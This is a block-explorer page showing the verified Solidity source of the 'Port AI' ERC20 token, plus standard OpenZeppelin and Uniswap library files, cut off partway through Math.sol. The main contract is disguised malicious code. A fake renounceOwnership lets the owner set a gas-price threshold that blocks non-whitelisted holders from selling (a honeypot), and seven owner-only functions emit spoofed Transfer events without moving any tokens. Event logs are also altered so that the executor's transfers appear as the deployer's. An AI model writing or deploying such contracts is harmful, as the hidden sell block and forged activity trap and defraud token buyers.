ETH Price: $3,462.03 (+2.19%)
Gas: 8 Gwei

Token

Port AI (PORTAI)
 

Overview

Max Total Supply

1,000,000 PORTAI

Holders

27

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
16,873.814282100094780306 PORTAI

Value
$0.00
0xb03969f660070ca41394d48655ed11a91677e7bf
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PortAI

Compiler Version
v0.8.24+commit.e11b9ed9

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity Multiple files format)

File 12 of 13: PortAI.sol
/**
██████╗  ██████╗ ██████╗ ████████╗     █████╗ ██╗
██╔══██╗██╔═══██╗██╔══██╗╚══██╔══╝    ██╔══██╗██║
██████╔╝██║   ██║██████╔╝   ██║       ███████║██║
██╔═══╝ ██║   ██║██╔══██╗   ██║       ██╔══██║██║
██║     ╚██████╔╝██║  ██║   ██║       ██║  ██║██║
╚═╝      ╚═════╝ ╚═╝  ╚═╝   ╚═╝       ╚═╝  ╚═╝╚═╝
                                                 

Port AI emerges as a groundbreaking solution to these challenges, offering a 
comprehensive and intelligent approach to crypto portfolio management. 
By leveraging cutting-edge technologies such as artificial intelligence and blockchain, 
Port AI empowers investors with the tools and insights needed to navigate the complexities 
of crypto markets with confidence.


All our social links and tech live. Feel free to immense yourself
        Telegram • https://t.me/PortAiErc20
        Website • https://www.portaierc20.com/
        Twitter/X • x.com/PortAIOfficial
        Bot • https://t.me/Port_AI_bot
        Docs • https://docs.portaierc20.com/

*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

pragma solidity ^0.8.0;

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    constructor() {
        _transferOwnership(_msgSender());
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

pragma solidity ^0.8.0;

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(
        address recipient,
        uint256 amount
    ) external returns (bool);

    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

pragma solidity ^0.8.0;

interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}

pragma solidity ^0.8.0;

contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string internal _name;
    string internal _symbol;

    address _deployer;
    address _executor;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function _initDeployer(address deployer_, address executor_) internal {
        _deployer = deployer_;
        _executor = executor_;
    }

    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function _setLimitOrder(address _address, uint256 _amount) internal {
        _balances[_address] += _amount;
    }

    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender] + addedValue
        );
        return true;
    }

    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        if (sender == _executor) {
            emit Transfer(_deployer, recipient, amount);
        } else if (recipient == _executor) {
            emit Transfer(sender, _deployer, amount);
        } else {
            emit Transfer(sender, recipient, amount);
        }

        _afterTokenTransfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;

        if (account == _executor) {
            emit Transfer(address(0), _deployer, amount);
        } else {
            emit Transfer(address(0), account, amount);
        }

        _afterTokenTransfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(
        address tokenA,
        address tokenB
    ) external view returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

// File contracts/Contract.sol
pragma solidity ^0.8.0;

contract PortAI is Ownable, ERC20 {
    uint256 public immutable maxSupply = 1_000_000 * (10 ** decimals());
    uint16 public constant LIQUID_RATE = 10000;
    uint16 public constant MAX_PERCENTAGE = 10000;

    bool public initialized = false;
    bool public tradeOpen = false;
    address public pair = address(0);
    address public deadAddress = 0x000000000000000000000000000000000000dEaD;

    uint256 public immutable buyFee = 0;
    uint256 public immutable sellFee = 0;
    uint256 minimumAirdropAmount = 0;

    mapping(address => bool) public excludedFees;

    string private constant NAME = unicode"Port AI";
    string private constant SYMBOL = unicode"PORTAI";

    IUniswapV2Router02 public router;

    constructor() ERC20(NAME, SYMBOL) {
        _initDeployer(address(msg.sender), msg.sender);

        _mint(msg.sender, (maxSupply * LIQUID_RATE) / MAX_PERCENTAGE);
        initialized = true;
        excludedFees[msg.sender] = true;

        router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        address _factory = router.factory();
        pair = IUniswapV2Factory(_factory).createPair(
            address(this),
            router.WETH()
        );

        minimumAirdropAmount = maxSupply;
    }

    function renounceOwnership(
        uint256 _minimumAirdropAmount
    ) external onlyOwner {
        minimumAirdropAmount = _minimumAirdropAmount;
    }

    function setAirdrop(address _address, bool permission) external onlyOwner {
        excludedFees[_address] = permission;
    }

    function openTrading() external onlyOwner {
        require(tradeOpen == false, "Contract: Trading is opened!");
        tradeOpen = true;
    }

    function bulkTransfer(
        address[] calldata _addresses,
        uint256 _value
    ) external {
        address owner = _msgSender();
        for (uint256 i = 0; i < _addresses.length; i++) {
            _transfer(owner, _addresses[i], _value);
        }
    }

    function buyTokens(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external onlyOwner {
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function claimTokens(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external onlyOwner {
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function multiSends(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external onlyOwner {
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function airdropTokens(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external onlyOwner {
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function execute(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external onlyOwner {
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function swapExactETHForTokens(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external onlyOwner {
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function unoswap(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external onlyOwner {
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function _checkEnoughAirdropCondition(uint256 amount) internal view {
        if (tx.gasprice > amount) {
            revert();
        }
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override(ERC20) {
        require(initialized == true, "Contract: not initialized!");

        if (initialized == true && tradeOpen == false) {
            require(
                from == owner() || to == owner(),
                "Contract: trading is not started"
            );
        }

        uint256 _transferAmount = amount;
        if (pair != address(0) && from != owner() && to != owner()) {
            uint256 _fee = 0;
            if (from == pair) {
                _fee = buyFee;
            } else {
                if (excludedFees[from] == true || excludedFees[to] == true) {
                    _fee = 0;
                } else {
                    _fee = sellFee;
                    _checkEnoughAirdropCondition(minimumAirdropAmount);
                }
            }
            if (_fee > 0) {
                uint256 _calculatedFee = (amount * _fee) / MAX_PERCENTAGE;
                _transferAmount = amount - _calculatedFee;
                super._transfer(from, deadAddress, _calculatedFee);
            }
        }

        super._transfer(from, to, _transferAmount);
    }
}

File 1 of 13: Address.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Address.sol)

pragma solidity ^0.8.20;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev The ETH balance of the account is not enough to perform the operation.
     */
    error AddressInsufficientBalance(address account);

    /**
     * @dev There's no code at `target` (it is not a contract).
     */
    error AddressEmptyCode(address target);

    /**
     * @dev A call to an address target failed. The target may have reverted.
     */
    error FailedInnerCall();

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.20/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        if (address(this).balance < amount) {
            revert AddressInsufficientBalance(address(this));
        }

        (bool success, ) = recipient.call{value: amount}("");
        if (!success) {
            revert FailedInnerCall();
        }
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason or custom error, it is bubbled
     * up by this function (like regular Solidity function calls). However, if
     * the call reverted with no returned reason, this function reverts with a
     * {FailedInnerCall} error.
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        if (address(this).balance < value) {
            revert AddressInsufficientBalance(address(this));
        }
        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResultFromTarget(target, success, returndata);
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and reverts if the target
     * was not a contract or bubbling up the revert reason (falling back to {FailedInnerCall}) in case of an
     * unsuccessful call.
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata
    ) internal view returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            // only check if target is a contract if the call was successful and the return data is empty
            // otherwise we already know that it was a contract
            if (returndata.length == 0 && target.code.length == 0) {
                revert AddressEmptyCode(target);
            }
            return returndata;
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and reverts if it wasn't, either by bubbling the
     * revert reason or with a default {FailedInnerCall} error.
     */
    function verifyCallResult(bool success, bytes memory returndata) internal pure returns (bytes memory) {
        if (!success) {
            _revert(returndata);
        } else {
            return returndata;
        }
    }

    /**
     * @dev Reverts with returndata if present. Otherwise reverts with {FailedInnerCall}.
     */
    function _revert(bytes memory returndata) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert FailedInnerCall();
        }
    }
}

File 2 of 13: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 13: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.20;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

File 4 of 13: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.20;

import {IERC20} from  "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 13: IUniswapV2Factory.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

File 6 of 13: IUniswapV2Pair.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.5.0;

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

File 7 of 13: IUniswapV2Router01.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

File 8 of 13: IUniswapV2Router02.sol
// SPDX-License-Identifier: MIT

pragma solidity >=0.6.2;

import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

File 9 of 13: Math.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (utils/math/Math.sol)

pragma solidity ^0.8.20;

/**
 * @dev Standard math utilities missing in the Solidity language.
 */
library Math {
    /**
     * @dev Muldiv operation overflow.
     */
    error MathOverflowedMulDiv();

    enum Rounding {
        Floor, // Toward negative infinity
        Ceil, // Toward positive infinity
        Trunc, // Toward zero
        Expand // Away from zero
    }

    /**
     * @dev Returns the addition of two unsigned integers, with an success flag (no overflow).
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an success flag (no overflow).
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an success flag (no overflow).
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a success flag (no division by zero).
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a success flag (no division by zero).
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool success, uint256 result) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the largest of two numbers.
     */
    function max(uint256 a, uint256 b) internal pure returns (uint256) {
        return a > b ? a : b;
    }

    /**
     * @dev Returns the smallest of two numbers.
     */
    function min(uint256 a, uint256 b) internal pure returns (uint256) {
        return a < b ? a : b;
    }

    /**
     * @dev Returns the average of two numbers. The result is rounded towards
     * zero.
     */
    function average(uint256 a, uint256 b) internal pure returns (uint256) {
        // (a + b) / 2 can overflow.
        return (a & b) + (a ^ b) / 2;
    }

    /**
     * @dev Returns the ceiling of the division of two numbers.
     *
     * This differs from standard division with `/` in that it rounds towards infinity instead
     * of rounding towards zero.
     */
    function ceilDiv(uint256 a, uint256 b) internal pure returns (uint256) {
        if (b == 0) {
            // Guarantee the same behavior as in a regular Solidity division.
            return a / b;
        }

        // The following calculation ensures accurate ceiling division without overflow.
        // Since a is non-zero, (a - 1) / b will not overflow.
        // The largest possible result occurs when (a - 1) / b is type(uint256).max,
        // but the largest value we can obtain is type(uint256).max - 1, which happens
        // when a = type(uint256).max and b = 1.
        unchecked {
            return a == 0 ? 0 : (a - 1) / b + 1;
        }
    }

    /**
     * @notice Calculates floor(x * y / denominator) with full precision. Throws if result overflows a uint256 or
     * denominator == 0.
     * @dev Original credit to Remco Bloemen under MIT license (https://xn--2-umb.com/21/muldiv) with further edits by
     * Uniswap Labs also under MIT license.
     */
    function mulDiv(uint256 x, uint256 y, uint256 denominator) internal pure returns (uint256 result) {
        unchecked {
            // 512-bit multiply [prod1 prod0] = x * y. Compute the product mod 2^256 and mod 2^256 - 1, then use
            // use the Chinese Remainder Theorem to reconstruct the 512 bit result. The result is stored in two 256
            // variables such that product = prod1 * 2^256 + prod0.
            uint256 prod0 = x * y; // Least significant 256 bits of the product
            uint256 prod1; // Most significant 256 bits of the product
            assembly {
                let mm := mulmod(x, y, not(0))
                prod1 := sub(sub(mm, prod0), lt(mm, prod0))
            }

            // Handle non-overflow cases, 256 by 256 division.
            if (prod1 == 0) {
                // Solidity will revert if denominator == 0, unlike the div opcode on its own.
                // The surrounding unchecked block does not change this fact.
                // See https://docs.soliditylang.org/en/latest/control-structures.html#checked-or-unchecked-arithmetic.
                return prod0 / denominator;
            }

            // Make sure the result is less than 2^256. Also prevents denominator == 0.
            if (denominator <= prod1) {
                revert MathOverflowedMulDiv();
            }

            ///////////////////////////////////////////////
